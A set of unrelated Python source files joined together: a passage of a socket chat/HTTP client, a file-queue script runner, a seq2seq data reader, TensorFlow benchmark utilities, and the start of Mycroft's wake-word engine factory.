            sock.send(m.encode('utf-8'))
            r2 = sock.recv(1024).decode('utf-8')
            m = input(r2)
            sock.send(m.encode('utf-8'))
            # ********
            result = sock.recv(1024).decode('utf-8')
            print("平行四边形面积:", result)
        else:
            r = sock.recv(1024)
            print(r.decode('utf-8'))
def Http(sock):
    """HTTP mode: collect request fields, send them, print the response.

    'end' leaves the mode; 'hist'/'HIST' prints the server-kept request
    history.  Empty answers fall back to defaults (port 80, url '/', CRLF
    connection header, 'text/html' content type).
    """
    illustrate = sock.recv(1024)
    print(illustrate.decode('utf-8'))
    while True:
        m = input("请求方法:")
        sock.send(m.encode('utf-8'))
        if m == "end":
            print('**结束Http模式**')
            break  # leave HTTP mode
        elif m == "hist" or m == "HIST":
            print("输出历史记录:")
            text = sock.recv(1024).decode('utf-8')
            print(text)
            continue
        else:
            # Prompt for each request field; blank input means "use default".
            m = input("Host:")
            sock.send(m.encode('utf-8'))
            m = input("Porst:")
            if not m:
                m = "80"
            sock.send(m.encode('utf-8'))
            m = input("Url:")
            if not m:
                m = "/"
            sock.send(m.encode('utf-8'))
            m = input("Connection:")
            if not m:
                m = "\r\n"
            sock.send(m.encode('utf-8'))
            m = input("Content-Type:")
            if not m:
                m = "text/html"
            sock.send(m.encode('utf-8'))
            response = sock.recv(1024 * 1024).decode('utf-8')
            print("返回数据:\n", response)
def monitor():
    """Background receiver: append incoming chat lines to the history box.

    Protocol: the literal text "breack" (sic) ends the loop; lines starting
    with the double-backslash "addr:" prefix announce a newly connected
    client address which is added to the roster.
    """
    while 1:
        text = sock.recv(1024)
        text = text.decode('utf-8')
        # print(text == "breack")
        # print(text[7:])
        if text == "breack":  # server sentinel ending the chat
            break
        elif text[:7] == "\\\\addr:":  # roster announcement
            addr_client = text[7:]
            if addr_client not in chat_client_list:
                chat_client_list.append(addr_client)
                add_chat_client_info()
            continue
        txtMsgList.insert(END, text)
def Chat(sock):
    """Chat mode: start the receive thread and hand control to Tk's mainloop."""
    global M,chat_client_list
    illustrate = sock.recv(1024)
    print(illustrate.decode('utf-8'))
    chat_client_list = []
    # Receive messages on a separate thread so the GUI stays responsive.
    M = threading.Thread(target=monitor)
    M.start()
    t.mainloop()
def main(sock):
    """Top-level dispatcher: ask the server for a mode and enter it.

    Loops until the server confirms "endserver"; each confirmed mode name
    hands control to the matching mode function.
    """
    while True:
        mod = sock.recv(1024)
        print(mod.decode('utf-8'))
        m = input('cliemt:')
        sock.send(m.encode('utf-8'))
        re = sock.recv(1024)
        re = re.decode('utf-8')
        print('------------------model-------------->', re)
        # *************mode selection and confirmation**************
        if re == "endserver":
            r = sock.recv(1024)
            print(r.decode('utf-8'))
            sock.close()
            break
        elif re == "autorobot":
            print("进入autorobot模式")
            autorobot(sock)
        elif re == "math":
            print("进入数学模式")
            math(sock)
        elif re == "Http":
            print("进入Http模式")
            Http(sock)
        elif re == "Chat":
            print("进入Chat模式")
            Chat(sock)
if __name__ == "__main__":
    # Connect and perform a simple "Test" echo handshake before chatting.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('172.20.10.13', 9090))  # use 'localhost' for local testing
    sock.send("Test".encode('utf-8'))
    test = sock.recv(1024)
    if test.decode('utf-8') == "Test":
        print('链接成功')
        addr = str(sock.recv(1024).decode('utf-8'))
        print(addr)
        # ***************handshake verified*******************
        main(sock)
    else:
        print(test.decode('utf-8'))
    sock.close()
|
core.py
|
__all__ = ['setup_dirs', 'find_next_script', 'check_if_process_running', 'safe_rename', 'ResourcePoolBase', 'ResourcePoolCPU']
import logging
import time
from datetime import datetime
import psutil
logger = logging.getLogger(__name__)
# Cell
import os
import subprocess
from copy import copy
from threading import Thread
from time import sleep
from uuid import uuid4
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
from fastcore.all import *
# Cell
def setup_dirs(path):
    "Create and return the following subdirs of `path`: to_run running complete fail out"
    path.mkdir(exist_ok=True)
    subdirs = L(path / name for name in 'to_run running complete fail out stalled'.split())
    for subdir in subdirs:
        subdir.mkdir(exist_ok=True)
    return subdirs
def find_next_script(p):
    """Get the first script from `p` (in sorted order)"""
    scripts = p.ls().sorted().filter(Self.is_file())
    return scripts[0] if scripts else None
def safe_rename(file, dest):
    """Move `file` to `dest`, prefixing a random uuid if there's a name conflict"""
    target = dest / file.name
    if target.exists():
        # Disambiguate with a timestamp plus uuid so nothing is overwritten.
        stem, ext = os.path.splitext(file.name)
        stamp = datetime.now().strftime("%c").replace(":", "-").replace(" ", "_")
        target = dest / f'{stem}--{stamp}--{uuid4()}{ext}'
        logger.warning(f'Using unique name {target}')
    file.replace(target)
    return target
def check_if_process_running(process_name):
    """
    Check if there is any running process that contains the given name processName.

    Returns the matching psutil.Process, or None when no process command
    line contains `process_name` (case-insensitive substring match).
    """
    # Iterate over the all the running process
    for proc in psutil.process_iter():
        try:
            # Check if process name contains the given name string.
            if any([process_name.lower() in p.lower() for p in proc.cmdline()]): # or '/bin/sh' in proc.cmdline()):
                logger.debug(f"=== PROCESS FOUND ===")
                logger.debug(f"name: {proc.name()}")
                logger.debug(f"create_time: {proc.create_time()}")
                logger.debug(f"is running: {proc.is_running()}")
                logger.debug(f"cmdline: {proc.cmdline()}")
                logger.debug(f"status: {proc.status()}")
                return proc
        # Processes can vanish or be inaccessible while we iterate; skip them.
        except psutil.AccessDenied:
            logger.debug("access denied")
        except psutil.ZombieProcess:
            logger.debug("Zombie process")
        except psutil.NoSuchProcess:
            logger.debug("No such process")
    logger.debug("Process not found returning None")
    return None
class ResourcePoolBase():
    # File-system based job runner: scripts move through to_run/ -> running/
    # -> complete/fail/stalled, with stdout/stderr captured under out/.
    # A "<ident>.lock" file under self.path marks a resource as busy.
    # (Method docstrings are attached below via fastcore's add_docs.)
    def __init__(self, path):
        self.path = Path(path)
        setup_dirs(self.path)

    def _lockpath(self, ident):
        # Lock file marking resource `ident` as in use.
        return self.path / f'{ident}.lock'

    def _is_locked(self, ident):
        return self._lockpath(ident).exists()

    def lock(self, ident, txt='locked'):
        # `txt` records why/by-what it is locked (e.g. the child pid).
        self._lockpath(ident).write_text(str(txt))

    def unlock(self, ident):
        return self._lockpath(ident).unlink() if self._is_locked(ident) else None

    def is_available(self, ident):
        return not self._is_locked(ident)

    def all_ids(self):
        raise NotImplementedError

    def find_next(self):
        return first(o for o in self.all_ids() if self.is_available(o))

    def lock_next(self):
        ident = self.find_next()
        if ident is None:
            return
        self.lock(ident)
        return ident

    def _launch(self, script, ident, env):
        # Run `script` synchronously, capturing stdout/stderr under out/,
        # and record the child's pid in the lock file while it runs.
        with (self.path / 'out' / f'{script.name}.stderr').open("w") as stderr:
            with (self.path / 'out' / f'{script.name}.stdout').open("w") as stdout:
                process = subprocess.Popen(str(script), env=env, stdout=stdout, stderr=stderr)
                self.lock(ident, str(process.pid))
                return process.wait()

    def _run(self, script, ident):
        # Worker body: launch the script, persist its exit code, then move
        # it to complete/ (exit 0) or fail/ (exception or non-zero exit),
        # and finally release the resource lock.
        logger.debug(f"running script on processor with ident: {ident}")
        failed = False
        env = copy(os.environ)
        try:
            res = self._launch(script, ident, env=env)
        except Exception as e:
            failed = str(e)
        (self.path / 'out' / f'{script.name}.exitcode').write_text(failed if failed else str(res))
        dest = self.path / 'fail' if failed or res else self.path / 'complete'
        finish_name = safe_rename(script, dest)
        self.unlock(ident)

    def run(self, *args, **kwargs):
        # Run asynchronously so poll_scripts can keep polling.
        thread = Thread(target=self._run, args=args, kwargs=kwargs)
        logger.debug("Starting Thread..")
        thread.start()

    def find_stale_scripts(self, terminate_timeout):
        # Inspect the script in running/ (if any): kill its process when it
        # is dead or older than `terminate_timeout` seconds; when no matching
        # process exists at all, move the script to stalled/ and unlock.
        script = find_next_script(self.path / 'running')
        if not script:
            logger.debug("No running scripts, exiting stale scripts search")
            return
        proc = check_if_process_running(script.name)
        if proc:
            if not proc.is_running():
                logger.debug(f"Script {script.name} is no longer running..attempting kill")
                proc.kill()
                logger.debug("Process Killed for not running")
            else:
                if terminate_timeout > 0:
                    run_duration = time.time() - proc.create_time()
                    if run_duration > terminate_timeout:
                        logger.warning(f"Process {script.name} has been running for {run_duration} "
                                       f"timeout set at {terminate_timeout}, killing..")
                        proc.kill()
                        logger.debug("Process Killed for terminate_timeout")
                    else:
                        logger.debug(f"Process {script.name} has been running for {run_duration}"
                                     f" timeout set at {terminate_timeout}, leaving as is..")
                        return
                else:
                    logger.debug("terminate_timeout not set, skipping check")
                    return
        else:
            logger.warning(f"Process {script.name} was not found yet script is in running folder..moving to stalled")
            # Anything that filters down to here must be moved to stalled
            logger.debug("Attempting to move stalled script to stalled folder")
            (self.path / 'out' / f'{script.name}.exitcode').write_text("stalled")
            dest = self.path / 'stalled'
            try:
                finish_name = safe_rename(script, dest)
                logger.debug("moved file to stalled")
            except Exception as er:
                logger.error(f"Error trying to move script to stalled, did it move?: {er}")
            # We only allow one processor for now so we know its processor with identity 0
            self.unlock(ident=0)

    def poll_scripts(self, poll_interval, exit_when_empty, terminate_timeout):
        # Main loop: every `poll_interval` seconds, reap stale scripts, then
        # pick the next script from to_run/, lock a resource, and run it.
        while True:
            logger.debug("==================== NEW POLL ============================")
            logger.debug(f"Sleeping for {poll_interval}")
            sleep(poll_interval)
            logger.debug("Searching for stale scripts")
            self.find_stale_scripts(terminate_timeout)
            script = find_next_script(self.path / 'to_run')
            if script is None:
                logger.debug("No scripts found in to_run folder")
                if exit_when_empty:
                    logger.debug("No more scripts to run, exit_when_empty set to True, exiting..")
                    break
                else:
                    continue
            logger.debug(f"Script found in to_run folder {script}")
            ident = self.lock_next()
            if ident is None:
                # First check if the lock is not being used
                script = find_next_script(self.path / 'running')
                if not script:
                    logger.debug("There is a lock but no scripts in running folder, unlocking..")
                    self.unlock(ident=0)
                    continue
                else:
                    logger.debug(f"could not find available processor to process {script}")
                    continue
            run_name = safe_rename(script, self.path / 'running')
            self.run(run_name, ident)
# Attach method docstrings via fastcore's add_docs (keeps the class body lean).
add_docs(ResourcePoolBase, "Base class for locked access to list of idents",
         unlock="Remove lockfile for `ident`",
         lock="Create lockfile for `ident`",
         is_available="Is `ident` available",
         all_ids="All idents (abstract method)",
         find_next="Finds next available resource, or None",
         lock_next="Locks an available resource and returns its ident, or None",
         run="Run `script` using resource `ident`",
         poll_scripts="Poll `to_run` for scripts and run in parallel on available resources",
         find_stale_scripts="Move out stale scripts")
# class FixedWorkerPool(ResourcePoolBase):
# "Vends locked access to fixed list of idents"
#
# def __init__(self, worker_ids, path):
# super().__init__(path)
# self.worker_ids = worker_ids
#
# def all_ids(self):
# "All available idents"
# return self.worker_ids
# Cell
class ResourcePoolCPU(ResourcePoolBase):
    "Vends locked access to CPUs"  # (docstring previously said "NVIDIA GPUs" — copy-paste slip)
    def __init__(self, path):
        # assume a 1 core processor, these are fake id's to be implemented properly
        self.ids = [0]
        super().__init__(path)

    def _launch(self, script, ident, env):
        # No CPU-specific environment setup yet; defer to the base launcher.
        return super()._launch(script, ident, env)

    # def is_available(self, ident):
    #     """
    #     Right now the CPU is always available, in next iteration we check if the CPU is overloaded or not
    #     :param ident:
    #     :return:
    #     """
    #     return True
    def all_ids(self):
        """All CPUs"""
        return self.ids
|
reader.py
|
from queue import Queue
import random
def padding_seq(seq):
    """Right-pad every sequence in `seq` with zeros to the longest length.

    Returns a new list of lists; the inputs are not mutated.  An empty
    `seq` yields an empty list (`default=0` keeps max() from raising).
    """
    max_len = max(map(len, seq), default=0)
    return [s + [0] * (max_len - len(s)) for s in seq]
def encode_text(words, vocab_indices):
    """Map each known word to its vocabulary index, dropping OOV words."""
    encoded = []
    for token in words:
        if token in vocab_indices:
            encoded.append(vocab_indices[token])
    return encoded
def decode_text(labels, vocabs, end_token='</s>'):
    """Join the tokens for `labels`, stopping at the first `end_token`."""
    words = []
    for index in labels:
        token = vocabs[index]
        if token == end_token:
            break
        words.append(token)
    return ' '.join(words)
# Read the vocabulary file.
def read_vocab(vocab_file):
    """Return the vocabulary: one token per line of `vocab_file`.

    The trailing newline is stripped by dropping each line's last character
    (matching the original behaviour).  Using a context manager guarantees
    the file is closed even if decoding raises, which the original
    open/close pair did not.
    """
    with open(vocab_file, 'rb') as f:
        return [line.decode('utf8')[:-1] for line in f]
class SeqReader():
    """Batched reader for paired input/target training files.

    Loads the whole corpus into memory in `_init_reader`, reshuffles it each
    time it is exhausted, and yields zero-padded batches forever via `read()`.
    """
    # Store configuration and load the training files.
    def __init__(self, input_file, target_file, vocab_file, batch_size,
                 queue_size=2048, worker_size=2, end_token='</s>',
                 padding=True, max_len=50):
        self.input_file = input_file  # training inputs
        self.target_file = target_file  # training targets
        self.end_token = end_token  # end-of-sequence marker
        self.batch_size = batch_size  # examples per batch
        self.padding = padding  # zero-pad batches to equal length
        self.max_len = max_len  # maximum sequence length
        # self.vocabs = read_vocab(vocab_file) + [end_token]
        self.vocabs = read_vocab(vocab_file)  # vocabulary token list
        self.vocab_indices = dict((c, i) for i, c in enumerate(self.vocabs))  # token -> index
        self.data_queue = Queue(queue_size)  # unused: worker threads are disabled (see start())
        self.worker_size = worker_size
        # Count the lines of the input file to size the dataset.
        # NOTE(review): if the input file is empty, `i` is never bound and the
        # `self.single_lines = i + 1` line raises NameError — confirm inputs
        # are never empty.
        with open(self.input_file, 'rb') as f:
            for i, l in enumerate(f):
                pass
        f.close()
        self.single_lines = i + 1
        self.data_size = int(self.single_lines / batch_size)
        self.data_pos = 0
        self._init_reader()

    def start(self):
        # Worker threads are intentionally disabled; _init_reader() already
        # loaded everything during __init__.
        return
        '''
        for i in range(self.worker_size):
            t = Thread(target=self._init_reader())
            t.daemon = True
            t.start()
        '''

    # Return one input/target pair, reshuffling when the data is exhausted.
    def read_single_data(self):
        if self.data_pos >= len(self.data):
            random.shuffle(self.data)
            self.data_pos = 0
        result = self.data[self.data_pos]
        self.data_pos += 1
        return result

    # Generator: yield batches of `batch_size` pairs forever.
    def read(self):
        while True:
            batch = {'in_seq': [],
                     'in_seq_len': [],
                     'target_seq': [],
                     'target_seq_len': []}
            for i in range(0, self.batch_size):  # collect batch_size pairs
                item = self.read_single_data()  # one input/target pair
                batch['in_seq'].append(item['in_seq'])
                batch['in_seq_len'].append(item['in_seq_len'])
                batch['target_seq'].append(item['target_seq'])
                batch['target_seq_len'].append(item['target_seq_len'])
            if self.padding:  # pad to the longest sequence in the batch
                batch['in_seq'] = padding_seq(batch['in_seq'])
                batch['target_seq'] = padding_seq(batch['target_seq'])
            yield batch

    # Load and encode the whole training corpus into self.data.
    def _init_reader(self):
        self.data = []
        input_f = open(self.input_file, 'rb')
        target_f = open(self.target_file, 'rb')
        for input_line in input_f:
            input_line = input_line.decode('utf-8')[:-1]  # input line
            input_words = [x for x in input_line.split(' ') if x != '']  # its tokens
            if len(input_words) >= self.max_len:  # truncate over-long inputs
                input_words = input_words[:self.max_len - 1]
            input_words.append(self.end_token)  # append end marker
            target_line = target_f.readline().decode('utf-8')[:-1]  # matching target line
            target_words = [x for x in target_line.split(' ') if x != '']  # its tokens
            if len(target_words) >= self.max_len:  # truncate over-long targets
                target_words = target_words[:self.max_len - 1]
            target_words = ['<s>', ] + target_words
            target_words.append(self.end_token)
            in_seq = encode_text(input_words, self.vocab_indices)  # input token ids
            target_seq = encode_text(target_words, self.vocab_indices)  # target token ids
            self.data.append({  # one training record
                'in_seq': in_seq,
                'in_seq_len': len(in_seq),
                'target_seq': target_seq,
                'target_seq_len': len(target_seq) - 1
            })
        input_f.close()
        target_f.close()
        # Start "exhausted" so the first read_single_data() shuffles the data.
        self.data_pos = len(self.data)
|
cnn_util.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for CNN benchmarks."""
from __future__ import print_function
import sys
import threading
import tensorflow as tf
# Runtime flags for this utility module (barrier choice, stdout flushing).
tf.flags.DEFINE_boolean('use_python32_barrier', False,
                        """When on, use threading.Barrier at python 3.2.""")
tf.flags.DEFINE_boolean('flush_stdout', False,
                        """When on, flush stdout everytime log_fn is called.""")
FLAGS = tf.flags.FLAGS
def tensorflow_version_tuple():
  """Return (major, minor, patch) from tf.__version__; patch stays a string."""
  major, minor, patch = tf.__version__.split('.')
  return (int(major), int(minor), patch)
def tensorflow_version():
  """Encode the TF version as a single int: major * 1000 + minor."""
  major, minor = tensorflow_version_tuple()[:2]
  return major * 1000 + minor
def log_fn(log):
  """Print `log`, flushing stdout when the --flush_stdout flag is set."""
  print(log)
  if FLAGS.flush_stdout:
    sys.stdout.flush()
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
  """Implements a lightweight Barrier.

  Useful for synchronizing a fixed number of threads at known synchronization
  points. Threads block on 'wait()' and simultaneously return once they have
  all made that call.

  # Implementation adapted from boost/thread/barrier.hpp
  """

  def __init__(self, parties):
    """Create a barrier, initialised to 'parties' threads."""
    self.cond = threading.Condition(threading.Lock())
    self.parties = parties
    # Indicates the number of waiting parties.
    self.waiting = 0
    # generation is needed to deal with spurious wakeups. If self.cond.wait()
    # wakes up for other reasons, generation will force it go back to wait().
    self.generation = 0
    self.broken = False

  def wait(self):
    """Wait for the barrier; returns immediately once the barrier is broken."""
    with self.cond:
      # Check if the barrier has been disabled or not.
      if self.broken:
        return
      gen = self.generation
      self.waiting += 1
      if self.waiting == self.parties:
        # Last arrival: reset the count and release this generation.
        self.waiting = 0
        self.generation += 1
        self.cond.notify_all()
      # loop because of spurious wakeups
      while gen == self.generation:
        self.cond.wait()

  # TODO(huangyp): Remove this method once we find a way to know which step
  # is the last barrier.
  def abort(self):
    """Clear existing barrier and disable this barrier."""
    with self.cond:
      if self.waiting > 0:
        self.generation += 1
        self.cond.notify_all()
      self.broken = True
class ImageProducer(object):
  """An image producer that puts images into a staging area periodically.

  This class is useful for periodically running a set of ops, `put_ops` on a
  different thread every `batch_group_size` times.

  The notify_image_consumption() method is used to increment an internal counter
  so that when it is first called, `put_ops` is executed. Afterwards, every
  `batch_group_size` times notify_image_consumption() is called,
  `put_ops` is executed again. A barrier is placed so that the main thread is
  blocked until `put_ops` have been executed.

  The start() method is used to start the thread that runs `put_ops`.

  The done() method waits until the last put_ops is executed and stops the
  thread.

  The purpose of this class is to fill an image input pipeline every
  `batch_group_size` steps. Suppose `put_ops` supplies M images to the input
  pipeline when run, and that every step, (M/`batch_group_size`) images are
  consumed. Then, by calling notify_image_consumption() every step, images are
  supplied to the input pipeline at the same amount they are consumed.
  """

  def __init__(self, sess, put_ops, batch_group_size):
    self.sess = sess
    self.num_gets = 0
    self.put_ops = put_ops
    self.batch_group_size = batch_group_size
    self.done_event = threading.Event()
    # threading.Barrier exists only on Python >= 3.2; otherwise use the
    # lightweight Barrier fallback defined above.
    if (FLAGS.use_python32_barrier and
        sys.version_info[0] == 3 and sys.version_info[1] >= 2):
      self.put_barrier = threading.Barrier(2)
    else:
      self.put_barrier = Barrier(2)

  def _should_put(self):
    # A new put is due every `batch_group_size` consumptions.
    return self.num_gets % self.batch_group_size == 0

  def done(self):
    """Stop the image producer."""
    self.done_event.set()
    # Unblock the producer thread if it is waiting on the barrier.
    self.put_barrier.abort()
    self.thread.join()

  def start(self):
    """Start the image producer."""
    self.thread = threading.Thread(target=self._loop_producer)
    # Set daemon to true to allow Ctrl + C to terminate all threads.
    self.thread.daemon = True
    self.thread.start()

  def notify_image_consumption(self):
    """Increment the counter of image_producer by 1.

    This should only be called by the main thread that consumes images and runs
    the model computation.
    """
    if self._should_put():
      self.put_barrier.wait()
    self.num_gets += 1

  def _loop_producer(self):
    # NOTE(review): Event.isSet() is the legacy alias of is_set().
    while not self.done_event.isSet():
      self.sess.run([self.put_ops])
      self.put_barrier.wait()
|
hotword_factory.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from time import sleep
import os
import platform
import posixpath
import tempfile
import requests
from contextlib import suppress
from glob import glob
from os.path import dirname, exists, join, abspath, expanduser, isfile, isdir
from petact import install_package
from shutil import rmtree
from threading import Timer, Event, Thread
from urllib.error import HTTPError
from mycroft.configuration import Configuration, LocalConf, USER_CONFIG
from mycroft.util.log import LOG
# Bundled pocketsphinx recognizer data lives next to this module.
RECOGNIZER_DIR = join(abspath(dirname(__file__)), "recognizer")
INIT_TIMEOUT = 10  # In seconds; max time to wait for an engine to construct
class TriggerReload(Exception):
    """Raised when a new engine binary was installed and the loop must reload."""
    pass
class NoModelAvailable(Exception):
    """Raised when no wake-word model could be downloaded or found locally."""
    pass
class HotWordEngine:
    """Base class for wake-word ("hot word") detection engines."""
    def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
        self.key_phrase = str(key_phrase).lower()
        # rough estimate 1 phoneme per 2 chars
        self.num_phonemes = len(key_phrase) / 2 + 1
        if config is None:
            # Fall back to this phrase's section of the global configuration.
            config = Configuration.get().get("hot_words", {})
            config = config.get(self.key_phrase, {})
        self.config = config
        self.listener_config = Configuration.get().get("listener", {})
        self.lang = str(self.config.get("lang", lang)).lower()

    def found_wake_word(self, frame_data):
        """Return True when the wake word was detected; base class never matches."""
        return False

    def update(self, chunk):
        """Feed an audio chunk to engines that consume a continuous stream."""
        pass

    def stop(self):
        """ Perform any actions needed to shut down the hot word engine.

            This may include things such as unloading loaded data or shutting
            down external processes.
        """
        pass
class PocketsphinxHotWord(HotWordEngine):
    """Wake-word engine backed by CMU PocketSphinx keyword spotting."""
    def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
        super(PocketsphinxHotWord, self).__init__(key_phrase, config, lang)
        # Hotword module imports
        from pocketsphinx import Decoder
        # Hotword module params
        self.phonemes = self.config.get("phonemes", "HH EY . M AY K R AO F T")
        self.num_phonemes = len(self.phonemes.split())
        self.threshold = self.config.get("threshold", 1e-90)
        # NOTE(review): the default of 1600 Hz looks like a typo for 16000 —
        # confirm against the listener configuration before changing.
        self.sample_rate = self.listener_config.get("sample_rate", 1600)
        dict_name = self.create_dict(self.key_phrase, self.phonemes)
        config = self.create_config(dict_name, Decoder.default_config())
        self.decoder = Decoder(config)

    def create_dict(self, key_phrase, phonemes):
        # Write a temporary pronunciation dictionary: one "<word> <phonemes>"
        # line per word; phoneme groups are separated by '.' in the config.
        (fd, file_name) = tempfile.mkstemp()
        words = key_phrase.split()
        phoneme_groups = phonemes.split('.')
        with os.fdopen(fd, 'w') as f:
            for word, phoneme in zip(words, phoneme_groups):
                f.write(word + ' ' + phoneme + '\n')
        return file_name

    def create_config(self, dict_name, config):
        # Point the decoder at the acoustic model and generated dictionary.
        model_file = join(RECOGNIZER_DIR, 'model', self.lang, 'hmm')
        if not exists(model_file):
            LOG.error('PocketSphinx model not found at ' + str(model_file))
        config.set_string('-hmm', model_file)
        config.set_string('-dict', dict_name)
        config.set_string('-keyphrase', self.key_phrase)
        config.set_float('-kws_threshold', float(self.threshold))
        config.set_float('-samprate', self.sample_rate)
        config.set_int('-nfft', 2048)
        config.set_string('-logfn', '/dev/null')
        return config

    def transcribe(self, byte_data, metrics=None):
        # Run one decoder utterance over `byte_data`; optionally report the
        # decode time to `metrics`.  Returns the hypothesis (may be None).
        start = time.time()
        self.decoder.start_utt()
        self.decoder.process_raw(byte_data, False, False)
        self.decoder.end_utt()
        if metrics:
            metrics.timer("mycroft.stt.local.time_s", time.time() - start)
        return self.decoder.hyp()

    def found_wake_word(self, frame_data):
        hyp = self.transcribe(frame_data)
        return hyp and self.key_phrase in hyp.hypstr.lower()
class PreciseHotword(HotWordEngine):
    """Wake-word engine backed by Mycroft Precise (a neural-net listener)."""
    def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
        super(PreciseHotword, self).__init__(key_phrase, config, lang)
        from precise_runner import (
            PreciseRunner, PreciseEngine, ReadWriteStream
        )
        # Drop an obsolete dist_url from the user config so the packaged
        # default is used instead.
        local_conf = LocalConf(USER_CONFIG)
        if local_conf.get('precise', {}).get('dist_url') == \
                'http://bootstrap.mycroft.ai/artifacts/static/daily/':
            del local_conf['precise']['dist_url']
            local_conf.store()
            Configuration.updated(None)
        self.download_complete = True
        # Placeholder timer; replaced when a download starts (on_download).
        self.show_download_progress = Timer(0, lambda: None)
        precise_config = Configuration.get()['precise']
        precise_exe = self.install_exe(precise_config['dist_url'])
        local_model = self.config.get('local_model_file')
        if local_model:
            self.precise_model = expanduser(local_model)
        else:
            self.precise_model = self.install_model(
                precise_config['model_url'], key_phrase.replace(' ', '-')
            ).replace('.tar.gz', '.pb')
        self.has_found = False
        self.stream = ReadWriteStream()

        # Activation is reported asynchronously; found_wake_word polls the flag.
        def on_activation():
            self.has_found = True
        trigger_level = self.config.get('trigger_level', 3)
        sensitivity = self.config.get('sensitivity', 0.5)
        self.runner = PreciseRunner(
            PreciseEngine(precise_exe, self.precise_model),
            trigger_level, sensitivity,
            stream=self.stream, on_activation=on_activation,
        )
        self.runner.start()

    @property
    def folder(self):
        # All precise artifacts (engine binary, models) are stored here.
        return join(expanduser('~'), '.mycroft', 'precise')

    def install_exe(self, url: str) -> str:
        """Install/refresh the precise engine binary and return its path.

        Raises TriggerReload when a new package was actually installed,
        since the listener must reload to pick it up.
        """
        url = url.format(arch=platform.machine())
        if not url.endswith('.tar.gz'):
            # The url points at a text file containing the real tarball url.
            url = requests.get(url).text.strip()
        if install_package(
                url, self.folder,
                on_download=self.on_download, on_complete=self.on_complete
        ):
            raise TriggerReload
        return join(self.folder, 'precise-engine', 'precise-engine')

    def install_model(self, url: str, wake_word: str) -> str:
        """Download the model for `wake_word`, falling back to a cached copy."""
        model_url = url.format(wake_word=wake_word)
        model_file = join(self.folder, posixpath.basename(model_url))
        try:
            install_package(
                model_url, self.folder,
                on_download=lambda: LOG.info('Updated precise model')
            )
        except (HTTPError, ValueError):
            if isfile(model_file):
                LOG.info("Couldn't find remote model. Using local file")
            else:
                raise NoModelAvailable('Failed to download model:', model_url)
        return model_file

    @staticmethod
    def _snd_msg(cmd):
        # Best-effort message to the Mark-1 faceplate over the serial port.
        with suppress(OSError):
            with open('/dev/ttyAMA0', 'w') as f:
                print(cmd, file=f)

    def on_download(self):
        LOG.info('Downloading Precise executable...')
        if isdir(join(self.folder, 'precise-stream')):
            # Remove artifacts from the obsolete precise-stream layout.
            rmtree(join(self.folder, 'precise-stream'))
        for old_package in glob(join(self.folder, 'precise-engine_*.tar.gz')):
            os.remove(old_package)
        self.download_complete = False
        # Periodically report progress while the download runs.
        self.show_download_progress = Timer(
            5, self.during_download, args=[True]
        )
        self.show_download_progress.start()

    def during_download(self, first_run=False):
        LOG.info('Still downloading executable...')
        if first_run:  # TODO: Localize
            self._snd_msg('mouth.text=Updating listener...')
        if not self.download_complete:
            # Re-arm until on_complete() flips download_complete.
            self.show_download_progress = Timer(30, self.during_download)
            self.show_download_progress.start()

    def on_complete(self):
        LOG.info('Precise download complete!')
        self.download_complete = True
        self.show_download_progress.cancel()
        self._snd_msg('mouth.reset')

    def update(self, chunk):
        # Forward raw audio into the runner's stream.
        self.stream.write(chunk)

    def found_wake_word(self, frame_data):
        # `frame_data` is unused: activation is signalled asynchronously via
        # on_activation(); this just consumes the latched flag.
        if self.has_found:
            self.has_found = False
            return True
        return False

    def stop(self):
        if self.runner:
            self.runner.stop()
class SnowboyHotWord(HotWordEngine):
    """Wake-word engine backed by the Snowboy detector."""
    def __init__(self, key_phrase="hey boss", config=None, lang="en-us"):
        super(SnowboyHotWord, self).__init__(key_phrase, config, lang)
        # Hotword module imports
        from snowboydecoder import HotwordDetector
        # Hotword module config
        module = self.config.get("module")
        if module != "snowboy":
            LOG.warning(module + " module does not match with Hotword class "
                                 "snowboy")
        # Hotword params: one model path per configured model, all sharing
        # the same sensitivity value.
        models = self.config.get("models", {})
        paths = []
        for key in models:
            paths.append(models[key])
        sensitivity = self.config.get("sensitivity", 0.5)
        self.snowboy = HotwordDetector(paths,
                                       sensitivity=[sensitivity] * len(paths))
        self.lang = str(lang).lower()
        self.key_phrase = str(key_phrase).lower()

    def found_wake_word(self, frame_data):
        # RunDetection returns the 1-based index of the matched model (or
        # 0 / negative values otherwise) — only the first model counts here.
        wake_word = self.snowboy.detector.RunDetection(frame_data)
        return wake_word == 1
class HotWordFactory:
    """Factory that instantiates the configured wake-word engine.

    Falls back to pocketsphinx when the requested engine fails to load.
    """
    CLASSES = {
        "pocketsphinx": PocketsphinxHotWord,
        "precise": PreciseHotword,
        "snowboy": SnowboyHotWord
    }

    @staticmethod
    def load_module(module, hotword, config, lang, loop):
        # Construct the engine on a daemon thread so a hung constructor
        # (e.g. a stalled download) cannot block the listener for more than
        # INIT_TIMEOUT seconds; returns None on any failure or timeout.
        LOG.info('Loading "{}" wake word via {}'.format(hotword, module))
        instance = None
        complete = Event()

        def initialize():
            nonlocal instance, complete
            try:
                clazz = HotWordFactory.CLASSES[module]
                instance = clazz(hotword, config, lang=lang)
            except TriggerReload:
                # A new engine binary was installed; ask the loop to reload.
                complete.set()
                sleep(0.5)
                loop.reload()
            except NoModelAvailable:
                LOG.warning('Could not found find model for {} on {}.'.format(
